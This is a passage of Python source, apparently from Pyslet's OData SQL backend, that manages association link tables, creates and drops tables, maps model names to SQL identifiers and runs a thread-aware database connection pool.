for k, v in dict_items(entity.key_dict()):
value_names.append(
self.container.mangled_names[
(self.aset_name,
self.entity_set.name,
self.toNavName,
k)])
values.append(
params.add_param(
self.container.prepare_sql_value(v)))
query.append(', '.join(value_names))
query.append(') VALUES (')
query.append(', '.join(values))
query.append(')')
query = ''.join(query)
try:
transaction.begin()
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
transaction.commit()
except self.container.dbapi.IntegrityError as e:
transaction.rollback(e, swallow=True)
raise edm.NavigationError(
"Model integrity error when linking %s and %s" %
(str(
self.from_entity.get_location()), str(
entity.get_location())))
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def replace_link(self, entity, transaction=None):
if self.from_entity[self.from_nav_name].isCollection:
if transaction is None:
transaction = SQLTransaction(self.container, self.connection)
try:
transaction.begin()
self.clear_links(transaction)
self.insert_link(entity, transaction)
transaction.commit()
except self.container.dbapi.IntegrityError as e:
transaction.rollback(e, swallow=True)
raise edm.NavigationError(
"Model integrity error when linking %s and %s" %
(str(
self.from_entity.get_location()), str(
entity.get_location())))
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
else:
# We don't support symmetric associations of the 0..1 - 0..1
# variety so this must be a 1..1 relationship.
raise edm.NavigationError(
"replace not allowed for 1-1 relationship "
"(implicit delete not supported)")
def __delitem__(self, key):
        # Before we remove a link we need to know if this is a 1-1
        # relationship; if so, this deletion would result in a
        # constraint violation.
if self.uniqueKeys:
raise edm.NavigationError("Can't remove a required link")
with self.entity_set.open() as targetCollection:
entity = targetCollection.new_entity()
entity.set_key(key)
self.delete_link(entity)
def delete_link(self, entity, transaction=None):
"""Called during cascaded deletes to force-remove a link prior
to the deletion of the entity itself.
        This method is also re-used for simple deletion of the link; in
        this case the link is in the auxiliary table itself."""
if transaction is None:
transaction = SQLTransaction(self.container, self.connection)
query = ['DELETE FROM ', self.atable_name]
params = self.container.ParamsClass()
# we suppress the filter check on the where clause
query.append(self.where_clause(entity, params, False))
query = ''.join(query)
try:
transaction.begin()
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
if transaction.cursor.rowcount == 0:
                # no rows matched: this must be a key failure at one
                # of the two ends
raise KeyError(
"One of the entities %s or %s no longer exists" %
(str(
self.from_entity.get_location()), str(
entity.get_location())))
transaction.commit()
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def clear_links(self, transaction=None):
"""Deletes all links from this collection's *from_entity*
transaction
An optional transaction. If present, the connection is left
uncommitted."""
if transaction is None:
transaction = SQLTransaction(self.container, self.connection)
query = ['DELETE FROM ', self.atable_name]
params = self.container.ParamsClass()
# we suppress the filter check on the where clause
query.append(self.where_clause(None, params, False))
query = ''.join(query)
try:
transaction.begin()
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
transaction.commit()
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
@classmethod
def clear_links_unbound(
cls,
container,
from_end,
from_entity,
transaction):
"""Special class method for deleting all the links from *from_entity*
This is a class method because it has to work even if there is
no navigation property bound to this end of the association.
container
The :py:class:`SQLEntityContainer` containing this
association set.
from_end
The :py:class:`~pyslet.odata2.csdl.AssociationSetEnd`
that represents the end of the association that
*from_entity* is bound to.
from_entity
The entity to delete links from
transaction
The current transaction (required)
        If there were a navigation property bound to this end then an
        instance could be created and the simpler
        :py:meth:`clear_links` method used instead."""
aset_name = from_end.parent.name
atable_name = container.mangled_names[(aset_name,)]
nav_name = from_entity.entity_set.linkEnds[from_end]
if nav_name is None:
# this is most likely the case, we're being called this way
# because we can't instantiate a collection on an unbound
# navigation property
nav_name = ""
entitySetA, nameA, entitySetB, nameB, uniqueKeys = container.aux_table[
aset_name]
if from_entity.entity_set is entitySetA and nav_name == nameA:
from_nav_name = nameA
else:
from_nav_name = nameB
query = ['DELETE FROM ', atable_name]
params = container.ParamsClass()
query.append(' WHERE ')
where = []
for k, v in dict_items(from_entity.key_dict()):
where.append(
"%s.%s=%s" %
(atable_name,
container.mangled_names[
(aset_name,
from_entity.entity_set.name,
from_nav_name,
k)],
params.add_param(
container.prepare_sql_value(v))))
query.append(' AND '.join(where))
query = ''.join(query)
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
@classmethod
def create_table_query(cls, container, aset_name):
"""Returns a SQL statement and params to create the auxiliary table.
This is a class method to enable the table to be created before
any entities are created."""
entitySetA, nameA, entitySetB, nameB, uniqueKeys = container.aux_table[
aset_name]
query = ['CREATE TABLE ', container.mangled_names[(aset_name,)], ' (']
params = container.ParamsClass()
cols = []
constraints = []
pk_names = []
for es, prefix, ab in ((entitySetA, nameA, 'A'),
(entitySetB, nameB, 'B')):
target_table = container.mangled_names[(es.name,)]
fk_names = []
k_names = []
for key_name in es.keys:
# create a dummy value to catch the unusual case where
# there is a default
v = es.entityType[key_name]()
cname = container.mangled_names[
(aset_name, es.name, prefix, key_name)]
fk_names.append(cname)
pk_names.append(cname)
k_names.append(container.mangled_names[(es.name, key_name)])
cols.append("%s %s" %
(cname, container.prepare_sql_type(v, params)))
constraints.append(
"CONSTRAINT %s FOREIGN KEY (%s) REFERENCES %s(%s)" %
(container.mangled_names[(aset_name, aset_name, "fk" + ab)],
', '.join(fk_names),
target_table, ', '.join(k_names)))
if uniqueKeys:
constraints.append("CONSTRAINT %s UNIQUE (%s)" % (
container.quote_identifier("u" + ab),
', '.join(fk_names)))
# Finally, add a unique constraint spanning all columns as we don't
# want duplicate relations
constraints.append("CONSTRAINT %s UNIQUE (%s)" % (
container.mangled_names[(aset_name, aset_name, "pk")],
', '.join(pk_names)))
cols = cols + constraints
query.append(", ".join(cols))
query.append(')')
return ''.join(query), params
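    # Rough illustration only (the exact column and constraint names
    # depend on mangle_name, so the names below are assumptions): for an
    # association set "Customers_PrimaryContacts" the generated statement
    # has this general shape::
    #
    #   CREATE TABLE "Customers_PrimaryContacts" (
    #       "Customers_..._CustomerID" <sql type>,
    #       "PrimaryContacts_..._ContactID" <sql type>,
    #       CONSTRAINT "..._fkA" FOREIGN KEY (...)
    #           REFERENCES "Customers" ("CustomerID"),
    #       CONSTRAINT "..._fkB" FOREIGN KEY (...)
    #           REFERENCES "PrimaryContacts" (...),
    #       CONSTRAINT "uA" UNIQUE (...),  -- only when uniqueKeys is True
    #       CONSTRAINT "uB" UNIQUE (...),  -- only when uniqueKeys is True
    #       CONSTRAINT "..._pk" UNIQUE (<all of the above columns>))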
@classmethod
def create_table(cls, container, aset_name):
"""Executes the SQL statement :py:meth:`create_table_query`"""
connection = container.acquire_connection(
SQL_TIMEOUT) #: a connection to the database
if connection is None:
raise DatabaseBusy(
"Failed to acquire connection after %is" % SQL_TIMEOUT)
transaction = SQLTransaction(container, connection)
try:
transaction.begin()
query, params = cls.create_table_query(container, aset_name)
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
transaction.commit()
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
if connection is not None:
container.release_connection(connection)
@classmethod
def drop_table_query(cls, container, aset_name):
"""Returns a SQL statement to drop the auxiliary table."""
entitySetA, nameA, entitySetB, nameB, uniqueKeys = container.aux_table[
aset_name]
query = ['DROP TABLE ', container.mangled_names[(aset_name,)]]
return ''.join(query)
@classmethod
def drop_table(cls, container, aset_name):
"""Executes the SQL statement :py:meth:`drop_table_query`"""
connection = container.acquire_connection(
SQL_TIMEOUT) #: a connection to the database
if connection is None:
raise DatabaseBusy(
"Failed to acquire connection after %is" % SQL_TIMEOUT)
transaction = SQLTransaction(container, connection)
try:
transaction.begin()
query = cls.drop_table_query(container, aset_name)
logging.info("%s;", query)
transaction.execute(query)
transaction.commit()
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
if connection is not None:
container.release_connection(connection)
class DummyLock(object):
"""An object to use in place of a real Lock, can always be acquired"""
def acquire(self, blocking=None):
return True
def release(self):
pass
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
pass
class SQLConnection(object):
"""An object used to wrap the connection.
Used in the connection pools to keep track of which thread owns the
connections, the depth of the lock and when the connection was last
modified (acquired or released)."""
def __init__(self):
self.thread = None
self.thread_id = None
self.locked = 0
self.last_seen = 0
self.dbc = None
class SQLEntityContainer(object):
"""Object used to represent an Entity Container (aka Database).
Keyword arguments on construction:
container
The :py:class:`~pyslet.odata2.csdl.EntityContainer` that defines
this database.
streamstore
An optional :py:class:`~pyslet.blockstore.StreamStore` that will
be used to store media resources in the container. If absent,
    media resource actions will generate NotImplementedError.
dbapi
The DB API v2 compatible module to use to connect to the
database.
This implementation is compatible with modules regardless of
their thread-safety level (provided they declare it
correctly!).
max_connections (optional)
The maximum number of connections to open to the database.
If your program attempts to open more than this number
(defaults to 10) then it will block until a connection
becomes free. Connections are always shared within the same
thread so this argument should be set to the expected
maximum number of threads that will access the database.
If using a module with thread-safety level 0 max_connections
is ignored and is effectively 1, so use of the API is then
best confined to single-threaded programs. Multi-threaded
programs can still use the API but it will block when there
is contention for access to the module and context switches
will force the database connection to be closed and reopened.
field_name_joiner (optional)
The character used by the name mangler to join compound
names, for example, to obtain the column name of a complex
property like "Address/City". The default is "_", resulting
in names like "Address_City" but it can be changed here.
Note: all names are quoted using :py:meth:`quote_identifier`
before appearing in SQL statements.
max_idle (optional)
The maximum number of seconds idle database connections should
be kept open before they are cleaned by the
:meth:`pool_cleaner`. The default is None which means that the
pool_cleaner never runs. Any other value causes a separate
thread to be created to run the pool cleaner passing the value
of the parameter each time. The frequency of calling the
pool_cleaner method is calculated by dividing max_idle by 5, but
it never runs more than once per minute. For example, a setting
of 3600 (1 hour) will result in a pool cleaner call every 12
minutes.
This class is designed to work with diamond inheritance and super.
All derived classes must call __init__ through super and pass all
unused keyword arguments. For example::
class MyDBContainer:
def __init__(self,myDBConfig,**kwargs):
super(MyDBContainer,self).__init__(**kwargs)
# do something with myDBConfig...."""
def __init__(self, container, dbapi, streamstore=None, max_connections=10,
field_name_joiner="_", max_idle=None, **kwargs):
if kwargs:
logging.debug(
"Unabsorbed kwargs in SQLEntityContainer constructor")
self.container = container
#: the :py:class:`~pyslet.odata2.csdl.EntityContainer`
self.streamstore = streamstore
#: the optional :py:class:`~pyslet.blockstore.StreamStore`
self.dbapi = dbapi
#: the DB API compatible module
self.module_lock = None
if self.dbapi.threadsafety == 0:
            # we can't even share the module, so just one connection will
            # do
self.module_lock = threading.RLock()
self.clocker = DummyLock
self.cpool_max = 1
else:
# Level 1 and above we can share the module
self.module_lock = DummyLock()
self.clocker = threading.RLock
self.cpool_max = max_connections
self.cpool_lock = threading.Condition()
self.cpool_locked = {}
self.cpool_unlocked = {}
self.cpool_idle = []
self.cpool_size = 0
self.closing = threading.Event()
# set up the parameter style
if self.dbapi.paramstyle == "qmark":
self.ParamsClass = QMarkParams
elif self.dbapi.paramstyle == "numeric":
self.ParamsClass = NumericParams
elif self.dbapi.paramstyle == "named":
self.ParamsClass = NamedParams
elif self.dbapi.paramstyle == "format":
self.ParamsClass = FormatParams
else:
# will fail later when we try and add parameters
logging.warn("Unsupported DBAPI params style: %s\n"
"setting to qmark",
self.dbapi.paramstyle)
self.ParamsClass = SQLParams
self.fk_table = {}
"""A mapping from an entity set name to a FK mapping of the form::
{<association set end>: (<nullable flag>, <unique keys flag>),...}
The outer mapping has one entry for each entity set (even if the
corresponding foreign key mapping is empty).
Each foreign key mapping has one entry for each foreign key
reference that must appear in that entity set's table. The key
is an :py:class:`AssociationSetEnd` that is bound to the entity
set (the other end will be bound to the target entity set).
This allows us to distinguish between the two ends of a
recursive association."""
self.aux_table = {}
"""A mapping from the names of symmetric association sets to a
tuple of::
(<entity set A>, <name prefix A>, <entity set B>,
<name prefix B>, <unique keys>)"""
self.mangled_names = {}
"""A mapping from source path tuples to mangled and quoted names
to use in SQL queries. For example::
            ('Customer',): '"Customer"'
            ('Customer', 'Address', 'City'): '"Address_City"'
            ('Customer', 'Orders'): '"Customer_Orders"'
Note that the first element of the tuple is the entity set name
but the default implementation does not use this in the mangled
name for primitive fields as they are qualified in contexts
where a name clash is possible. However, mangled navigation
        property names do include the table name prefix as they are used as
pseudo-table names."""
self.field_name_joiner = field_name_joiner
"""Default string used to join complex field names in SQL
queries, e.g. Address_City"""
self.ro_names = set()
"""The set of names that should be considered read only by the
SQL insert and update generation code. The items in the set are
source paths, as per :py:attr:`mangled_names`. The set is
populated on construction using the :py:meth:`ro_name` method."""
# for each entity set in this container, bind a SQLEntityCollection
# object
for es in self.container.EntitySet:
self.fk_table[es.name] = {}
for source_path in self.source_path_generator(es):
self.mangled_names[source_path] = self.mangle_name(source_path)
if self.ro_name(source_path):
self.ro_names.add(source_path)
self.bind_entity_set(es)
for es in self.container.EntitySet:
for np in es.entityType.NavigationProperty:
self.bind_navigation_property(es, np.name)
# once the navigation properties have been bound, fk_table will
# have been populated with any foreign keys we need to add field
# name mappings for
for esName, fk_mapping in dict_items(self.fk_table):
for link_end, details in dict_items(fk_mapping):
aset_name = link_end.parent.name
target_set = link_end.otherEnd.entity_set
for key_name in target_set.keys:
"""Foreign keys are given fake source paths starting
with the association set name::
( "Orders_Customers", "CustomerID" )"""
source_path = (esName, aset_name, key_name)
self.mangled_names[source_path] = \
self.mangle_name(source_path)
# and aux_table will have been populated with additional tables to
# hold symmetric associations...
for aSet in self.container.AssociationSet:
if aSet.name not in self.aux_table:
continue
self.mangled_names[(aSet.name,)] = self.mangle_name((aSet.name,))
"""Foreign keys in Tables that model association sets are
given fake source paths that combine the entity set name and
the name of the navigation property endpoint.
This ensures the special case where the two entity sets are
the same is taken care of (as the navigation property
endpoints must still be unique). For one-way associations,
prefixB will be an empty string."""
esA, prefixA, esB, prefixB, unique = self.aux_table[aSet.name]
for key_name in esA.keys:
source_path = (aSet.name, esA.name, prefixA, key_name)
self.mangled_names[source_path] = self.mangle_name(source_path)
for key_name in esB.keys:
source_path = (aSet.name, esB.name, prefixB, key_name)
self.mangled_names[source_path] = self.mangle_name(source_path)
"""And mangle the foreign key constraint names..."""
for kc in ('fkA', 'fkB', "pk"):
source_path = (aSet.name, aSet.name, kc)
self.mangled_names[source_path] = self.mangle_name(source_path)
# start the pool cleaner thread if required
if max_idle is not None:
t = threading.Thread(
target=self._run_pool_cleaner, kwargs={'max_idle': max_idle})
t.setDaemon(True)
t.start()
logging.info("Starting pool_cleaner with max_idle=%f" %
float(max_idle))
def mangle_name(self, source_path):
"""Mangles a source path into a quoted SQL name
This is a key extension point to use when you are wrapping an existing
database with the API. It allows you to control the names used for
entity sets (tables) and properties (columns) in SQL queries.
source_path
A tuple or list of strings describing the path to a property
in the metadata model.
For entity sets, this is a tuple with a single entry in it,
the entity set name.
For data properties this is a tuple containing the path,
including the entity set name e.g.,
("Customers","Address","City") for the City property in a
complex property 'Address' in entity set "Customers".
For navigation properties the tuple is the navigation
property name prefixed with the entity set name, e.g.,
("Customers","Orders"). This name is only used as a SQL
alias for the target table, to remove ambiguity from certain
queries that include a join across the navigation property.
            The mangled name must be distinct from the entity set name
            itself, from other such aliases and from other column names
            in this table.
Foreign key properties contain paths starting with both the
entity set and the association set names (see
:py:class:`SQLForeignKeyCollection` for details) unless the
association is symmetric, in which case they also contain
the navigation property name (see
:py:class:`SQLAssociationCollection` for details of these
more complex cases).
The default implementation strips the entity set name away and
uses the default joining character to create a compound name
before calling
:py:meth:`quote_identifier` to obtain the SQL string. All names
are mangled once, on construction, and from then on looked up in
the dictionary of mangled names.
If you need to override this method to modify the names used in
your database you should ensure all other names (including any
unrecognized by your program) are passed to the default
implementation for mangling."""
if len(source_path) > 1:
source_path = list(source_path)[1:]
return self.quote_identifier(
self.field_name_joiner.join(source_path))
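    # A minimal sketch of the kind of override described above, assuming
    # you are wrapping an existing database whose Customers table is
    # really called "tblCustomer" with a "cust_id" key column (both names
    # are invented for illustration). Unrecognized paths go to the default
    # implementation, as required::
    #
    #   class LegacyNameContainer(SQLEntityContainer):
    #
    #       KNOWN_NAMES = {
    #           ("Customers",): '"tblCustomer"',
    #           ("Customers", "CustomerID"): '"cust_id"',
    #       }
    #
    #       def mangle_name(self, source_path):
    #           try:
    #               return self.KNOWN_NAMES[tuple(source_path)]
    #           except KeyError:
    #               return super(LegacyNameContainer, self).mangle_name(
    #                   source_path)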
def ro_name(self, source_path):
"""Test if a source_path identifies a read-only property
        This is an additional extension point to use when you are
wrapping an existing database with the API. It allows you to
manage situations where an entity property has an implied
value and should be treated read only.
There are two key use cases, auto-generated primary keys (such
as auto-increment integer keys) and foreign keys which are
exposed explicitly as foreign keys and should only be updated
through an associated navigation property.
source_path
A tuple or list of strings describing the path to a property
in the metadata model. See :py:meth:`mangle_name` for more
information.
The default implementation returns False.
If you override this method you must ensure all other names
(including any unrecognized by your program) are passed to the
default implementation using super."""
return False
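    # Continuing the sketch above, and assuming "CustomerID" is an
    # auto-increment key (an assumption for illustration): mark it read
    # only and defer everything else to the default implementation::
    #
    #   class LegacyNameContainer(SQLEntityContainer):
    #
    #       def ro_name(self, source_path):
    #           if tuple(source_path) == ("Customers", "CustomerID"):
    #               return True
    #           return super(LegacyNameContainer, self).ro_name(source_path)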
def source_path_generator(self, entity_set):
"""Utility generator for source path *tuples* for *entity_set*"""
yield (entity_set.name,)
for source_path in self.type_name_generator(entity_set.entityType):
yield tuple([entity_set.name] + source_path)
if entity_set.entityType.has_stream():
yield (entity_set.name, '_value')
for link_end, nav_name in dict_items(entity_set.linkEnds):
if not nav_name:
# use the role name of the other end of the link instead
# this makes sense because if entity_set is 'Orders' and
# is linked to 'Customers' but lacks a navigation
# property then the role name for link_end is likely to
# be something like 'Order' and the other end is likely
# to be something like 'Customer' - which provides a
# reasonable guess at what the navigation property might
# have been called and, furthermore, is under the
# control of the model designer without directly
# affecting the entities themselves.
yield (entity_set.name, link_end.otherEnd.name)
else:
yield (entity_set.name, nav_name)
def type_name_generator(self, type_def):
for p in type_def.Property:
if p.complexType is not None:
for subPath in self.type_name_generator(p.complexType):
yield [p.name] + subPath
else:
yield [p.name]
def bind_entity_set(self, entity_set):
entity_set.bind(self.get_collection_class(), container=self)
def bind_navigation_property(self, entity_set, name):
# Start by making a tuple of the end multiplicities.
from_as_end = entity_set.navigation[name]
to_as_end = from_as_end.otherEnd
# extract the name of the association set
aset_name = from_as_end.parent.name
target_set = to_as_end.entity_set
multiplicity = (
from_as_end.associationEnd.multiplicity,
to_as_end.associationEnd.multiplicity)
# now we can work on a case-by-case basis, note that fk_table may
# be filled in twice for the same association (if navigation
# properties are defined in both directions) but this is benign
# because the definition should be identical.
if multiplicity in (
(edm.Multiplicity.One, edm.Multiplicity.One),
(edm.Multiplicity.ZeroToOne, edm.Multiplicity.ZeroToOne)):
entity_set.bind_navigation(
name,
self.get_symmetric_navigation_class(),
container=self,
aset_name=aset_name)
if aset_name in self.aux_table:
# This is the navigation property going back the other
# way, set the navigation name only
self.aux_table[aset_name][3] = name
else:
self.aux_table[aset_name] = [
entity_set, name, target_set, "", True]
elif multiplicity == (edm.Multiplicity.Many, edm.Multiplicity.Many):
entity_set.bind_navigation(
name,
self.get_symmetric_navigation_class(),
container=self,
aset_name=aset_name)
if aset_name in self.aux_table:
self.aux_table[aset_name][3] = name
else:
self.aux_table[aset_name] = [
entity_set, name, target_set, "", False]
elif (multiplicity ==
(edm.Multiplicity.One, edm.Multiplicity.ZeroToOne)):
entity_set.bind_navigation(name,
self.get_rk_class(),
container=self, aset_name=aset_name)
self.fk_table[target_set.name][to_as_end] = (False, True)
elif multiplicity == (edm.Multiplicity.One, edm.Multiplicity.Many):
entity_set.bind_navigation(name,
self.get_rk_class(),
container=self, aset_name=aset_name)
self.fk_table[target_set.name][to_as_end] = (False, False)
elif (multiplicity ==
(edm.Multiplicity.ZeroToOne, edm.Multiplicity.Many)):
entity_set.bind_navigation(
name,
self.get_rk_class(),
container=self,
aset_name=aset_name)
self.fk_table[target_set.name][to_as_end] = (True, False)
elif (multiplicity ==
(edm.Multiplicity.ZeroToOne, edm.Multiplicity.One)):
entity_set.bind_navigation(
name,
self.get_fk_class(),
container=self,
aset_name=aset_name)
self.fk_table[entity_set.name][from_as_end] = (False, True)
elif multiplicity == (edm.Multiplicity.Many, edm.Multiplicity.One):
entity_set.bind_navigation(
name,
self.get_fk_class(),
container=self,
aset_name=aset_name)
self.fk_table[entity_set.name][from_as_end] = (False, False)
else:
# (edm.Multiplicity.Many,edm.Multiplicity.ZeroToOne)
entity_set.bind_navigation(name, self.get_fk_class(
), container=self, aset_name=aset_name)
self.fk_table[entity_set.name][from_as_end] = (True, False)
def get_collection_class(self):
"""Returns the collection class used to represent a generic entity set.
Override this method to provide a class derived from
:py:class:`SQLEntityCollection` when you are customising this
implementation for a specific database engine."""
return SQLEntityCollection
def get_symmetric_navigation_class(self):
"""Returns the collection class used to represent a symmetric relation.
Override this method to provide a class derived from
:py:class:`SQLAssociationCollection` when you are customising this
implementation for a specific database engine."""
return SQLAssociationCollection
def get_fk_class(self):
"""Returns the class used when the FK is in the source table.
Override this method to provide a class derived from
:py:class:`SQLForeignKeyCollection` when you are customising this
implementation for a specific database engine."""
return SQLForeignKeyCollection
def get_rk_class(self):
"""Returns the class used when the FK is in the target table.
Override this method to provide a class derived from
:py:class:`SQLReverseKeyCollection` when you are customising this
implementation for a specific database engine."""
return SQLReverseKeyCollection
def create_all_tables(self, out=None):
"""Creates all tables in this container.
out
An optional file-like object. If given, the tables are not
actually created, the SQL statements are written to this
file instead.
Tables are created in a sensible order to ensure that foreign
        key constraints do not fail. However, this method is not compatible
        with databases that contain circular references, e.g.,
Table A -> Table B with a foreign key and Table B -> Table A
with a foreign key. Such databases will have to be created by
hand. You can use the create_table_query methods to act as a
starting point for your script."""
visited = set()
create_list = []
for es in self.container.EntitySet:
if es.name not in visited:
self.create_table_list(es, visited, create_list)
for es in create_list:
with es.open() as collection:
if out is None:
collection.create_table()
else:
query, params = collection.create_table_query()
out.write(query)
out.write(";\n\n")
if params.params:
logging.warning("Ignoring params to CREATE TABLE: %s",
to_text(params.params))
# we now need to go through the aux_table and create them
for aset_name in self.aux_table:
nav_class = self.get_symmetric_navigation_class()
if out is None:
nav_class.create_table(self, aset_name)
else:
query, params = nav_class.create_table_query(self, aset_name)
out.write(query)
out.write(";\n\n")
if params.params:
logging.warning("Ignoring params to CREATE TABLE: %s",
to_text(params.params))
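    # Usage sketch: given a bound container instance ``db``, either create
    # the tables directly or capture the DDL in a script via the optional
    # ``out`` argument (the file name here is an assumption)::
    #
    #   db.create_all_tables()
    #   # ...or...
    #   with open("schema.sql", "w") as script:
    #       db.create_all_tables(out=script)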
def CreateAllTables(self): # noqa
warnings.warn("SQLEntityContainer.CreateAllTables is deprecated, "
"use create_all_tables",
DeprecationWarning,
stacklevel=3)
return self.create_all_tables()
def create_table(self, es, visited):
# before we create this table, we need to check to see if it
# references another table
visited.add(es.name)
fk_mapping = self.fk_table[es.name]
for link_end, details in dict_items(fk_mapping):
target_set = link_end.otherEnd.entity_set
if target_set.name in visited:
# prevent recursion
continue
self.create_table(target_set, visited)
# now we are free to create the table
with es.open() as collection:
collection.create_table()
def create_table_list(self, es, visited, create_list):
# before we create this table, we need to check to see if it
# references another table
visited.add(es.name)
fk_mapping = self.fk_table[es.name]
for link_end, details in dict_items(fk_mapping):
target_set = link_end.otherEnd.entity_set
if target_set.name in visited:
# prevent infinite recursion
continue
self.create_table_list(target_set, visited, create_list)
# now we are free to create the table
create_list.append(es)
def drop_all_tables(self, out=None):
"""Drops all tables in this container.
Tables are dropped in a sensible order to ensure that foreign
key constraints do not fail, the order is essentially the
reverse of the order used by :py:meth:`create_all_tables`."""
# first we need to go through the aux_table and drop them
for aset_name in self.aux_table:
nav_class = self.get_symmetric_navigation_class()
if out is None:
try:
nav_class.drop_table(self, aset_name)
except SQLError as e:
logging.warn("Ignoring : %s", str(e))
else:
query = nav_class.drop_table_query(self, aset_name)
out.write(query)
out.write(";\n\n")
visited = set()
drop_list = []
for es in self.container.EntitySet:
if es.name not in visited:
self.create_table_list(es, visited, drop_list)
drop_list.reverse()
for es in drop_list:
with es.open() as collection:
if out is None:
try:
collection.drop_table()
except SQLError as e:
logging.warn("Ignoring : %s", str(e))
else:
query = collection.drop_table_query()
out.write(query)
out.write(";\n\n")
def acquire_connection(self, timeout=None):
# block on the module for threadsafety==0 case
thread = threading.current_thread()
thread_id = thread.ident
now = start = time.time()
cpool_item = None
close_flag = False
with self.cpool_lock:
if self.closing.is_set():
# don't open connections when we are trying to close them
return None
while not self.module_lock.acquire(False):
self.cpool_lock.wait(timeout)
now = time.time()
if timeout is not None and now > start + timeout:
                    logging.warn(
                        "Thread[%i] timed out waiting for the database "
                        "module lock", thread_id)
return None
# we have the module lock
cpool_item = self.cpool_locked.get(thread_id, None)
if cpool_item:
# our thread_id is in the locked table
cpool_item.locked += 1
cpool_item.last_seen = now
while cpool_item is None:
if thread_id in self.cpool_unlocked:
# take the connection that last belonged to us
cpool_item = self.cpool_unlocked[thread_id]
del self.cpool_unlocked[thread_id]
logging.debug("Thread[%i] re-acquiring connection",
thread_id)
elif (self.cpool_idle):
# take a connection from an expired thread
cpool_item = self.cpool_idle.pop()
elif self.cpool_size < self.cpool_max:
# Add a new connection
cpool_item = SQLConnection()
# do the actual open outside of the cpool lock
self.cpool_size += 1
elif self.cpool_unlocked:
# take a connection that doesn't belong to us, popped at
# random
old_thread_id, cpool_item = self.cpool_unlocked.popitem()
if self.dbapi.threadsafety > 1:
logging.debug(
"Thread[%i] recycled database connection from "
"Thread[%i]", thread_id, old_thread_id)
else:
logging.debug(
"Thread[%i] closed an unused database connection "
"(max connections reached)", old_thread_id)
# is it ok to close a connection from a different
# thread? Yes: we require it!
close_flag = True
else:
now = time.time()
if timeout is not None and now > start + timeout:
logging.warn(
"Thread[%i] timed out waiting for a database "
"connection", thread_id)
break
logging.debug(
"Thread[%i] forced to wait for a database connection",
thread_id)
self.cpool_lock.wait(timeout)
logging.debug(
"Thread[%i] resuming search for database connection",
thread_id)
continue
cpool_item.locked += 1
cpool_item.thread = thread
cpool_item.thread_id = thread_id
cpool_item.last_seen = time.time()
self.cpool_locked[thread_id] = cpool_item
if cpool_item:
if close_flag:
self.close_connection(cpool_item.dbc)
cpool_item.dbc = None
if cpool_item.dbc is None:
cpool_item.dbc = self.open()
return cpool_item
# we are defeated, no database connection for the caller
# release lock on the module as there is no connection to release
self.module_lock.release()
return None
def release_connection(self, release_item):
thread_id = threading.current_thread().ident
close_flag = False
with self.cpool_lock:
# we have exclusive use of the cpool members
cpool_item = self.cpool_locked.get(thread_id, None)
if cpool_item:
if cpool_item is release_item:
self.module_lock.release()
cpool_item.locked -= 1
cpool_item.last_seen = time.time()
if not cpool_item.locked:
del self.cpool_locked[thread_id]
self.cpool_unlocked[thread_id] = cpool_item
self.cpool_lock.notify()
return
# it seems likely that some other thread is going to leave a
# locked connection now, let's try and find it to correct
# the situation
bad_thread, bad_item = None, None
for tid, cpool_item in dict_items(self.cpool_locked):
if cpool_item is release_item:
bad_thread = tid
bad_item = cpool_item
break
if bad_item is not None:
self.module_lock.release()
bad_item.locked -= 1
bad_item.last_seen = time.time()
if not bad_item.locked:
del self.cpool_locked[bad_thread]
self.cpool_unlocked[bad_item.thread_id] = bad_item
self.cpool_lock.notify()
logging.error(
"Thread[%i] released database connection originally "
"acquired by Thread[%i]", thread_id, bad_thread)
return
# this is getting frustrating, exactly which connection does
# this thread think it is trying to release?
# Check the idle pool just in case
bad_item = None
for i in range3(len(self.cpool_idle)):
cpool_item = self.cpool_idle[i]
if cpool_item is release_item:
bad_item = cpool_item
del self.cpool_idle[i]
self.cpool_size -= 1
break
if bad_item is not None:
# items in the idle pool are already unlocked
logging.error(
"Thread[%i] released a database connection from the "
"idle pool: closing for safety", thread_id)
close_flag = True
# ok, this really is an error!
            logging.error(
                "Thread[%i] attempted to unlock an unknown database "
                "connection: %s", thread_id, repr(release_item))
if close_flag:
self.close_connection(release_item.dbc)
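    # Typical usage pattern for the pool, as used by the create_table and
    # drop_table class methods above (sketch)::
    #
    #   connection = container.acquire_connection(SQL_TIMEOUT)
    #   if connection is None:
    #       raise DatabaseBusy(
    #           "Failed to acquire connection after %is" % SQL_TIMEOUT)
    #   try:
    #       pass    # ... use the connection ...
    #   finally:
    #       container.release_connection(connection)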
def connection_stats(self):
"""Return information about the connection pool
Returns a triple of:
nlocked
the number of connections in use by all threads.
        nunlocked
            the number of connections open but not currently in use
        nidle
            the number of connections in the idle ('dead') pool
Connections are placed in the 'dead pool' when unexpected lock
failures occur or if they are locked and the owning thread is
detected to have terminated without releasing them."""
with self.cpool_lock:
# we have exclusive use of the cpool members
return (len(self.cpool_locked), len(self.cpool_unlocked),
len(self.cpool_idle))
def _run_pool_cleaner(self, max_idle=SQL_TIMEOUT * 10.0):
run_time = max_idle / 5.0
if run_time < 60.0:
run_time = 60.0
while not self.closing.is_set():
self.closing.wait(run_time)
self.pool_cleaner(max_idle)
def pool_cleaner(self, max_idle=SQL_TIMEOUT * 10.0):
"""Cleans up the connection pool
max_idle (float)
Optional number of seconds beyond which an idle connection
is closed. Defaults to 10 times the
:data:`SQL_TIMEOUT`."""
now = time.time()
old_time = now - max_idle
to_close = []
with self.cpool_lock:
locked_list = list(dict_values(self.cpool_locked))
for cpool_item in locked_list:
if not cpool_item.thread.isAlive():
logging.error(
"Thread[%i] failed to release database connection "
"before terminating", cpool_item.thread_id)
del self.cpool_locked[cpool_item.thread_id]
to_close.append(cpool_item.dbc)
unlocked_list = list(dict_values(self.cpool_unlocked))
for cpool_item in unlocked_list:
if not cpool_item.thread.isAlive():
logging.debug(
"pool_cleaner moving database connection to idle "
"after Thread[%i] terminated",
cpool_item.thread_id)
del self.cpool_unlocked[cpool_item.thread_id]
cpool_item.thread_id = None
cpool_item.thread = None
